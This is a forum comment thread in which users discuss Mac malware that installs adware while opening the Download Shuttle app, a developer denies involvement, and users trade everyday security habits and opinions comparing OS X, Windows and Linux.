I was wondering why Download Shuttle has so many more users than my app (Fat Pipe). Seems like they are playing with the world of adware marketing, I hope they aren't doing weird things with the OS as well :/.
Our app, Download Shuttle, has nothing whatsoever to do with this malware. We have no idea why the malware creator decided to open up Download Shuttle in the Mac App Store.
We can only speculate that it was done in order to disguise what the malware is really doing (installing adware such as Genieo).
Download Shuttle is a free app and makes up an insignificant part of our overall Mac app portfolio. FIPLAB is one of the longest standing app developers on the Mac App Store and our apps have been featured multiple times by Apple themselves.
The most important thing is keeping the OS up to date. And I don't visit shady websites.
Flash standalone is removed, and it's disabled in Chrome. Lastpass for passwords. Tunnelblick + PrivateTunnel for open networks. And even though I use some software that isn't signed, after I've installed such software I revert the Security & Privacy "allow apps" setting back to App Store + identified devs. And, relevant just by coincidence in this case, I'm using 10.9.5 (which is still currently maintained with security updates).
The reality is that Mac users are simply used to trusting Apple to handle these sorts of things. And it's not a good alternative for that trust to be lost and placed in a 3rd party, e.g. on Windows where trust loss means a litany of 3rd parties to choose from in that space with no real practical way to differentiate, and the Windows Store described as a "cesspool of scams." Apple will get this fixed soon. It's definitely sub-optimal response wise, but I still trust this ecosystem compared to Windows at this point.
Exploits and high-risk vulnerabilities are certainly being closed with security updates. That's their purpose. Major changes aren't practical for Apple, and they do everything they can to incentivize (badger) people into upgrading to the current version.
You can also install another OS. Putting an Ubuntu LTS or Debian stable on it will help you way more, compared to OS X 10.9.5, than any number of other mitigation strategies.
Frankly, I'm way more comfortable taking my Windows 8.1 machine to public wifi hotspots these days than my OS X 10.9 machine.
Oh, yes, obviously use google-chrome (not even chromium; there's too much free-software-purity stuff in the Debian builds for me to feel comfortable with its security profile). At this point it didn't even occur to me that you could use another browser and consider yourself secure, such is the awful world we live in.
[1] https://twitter.com/i0n1c/status/624172774915973120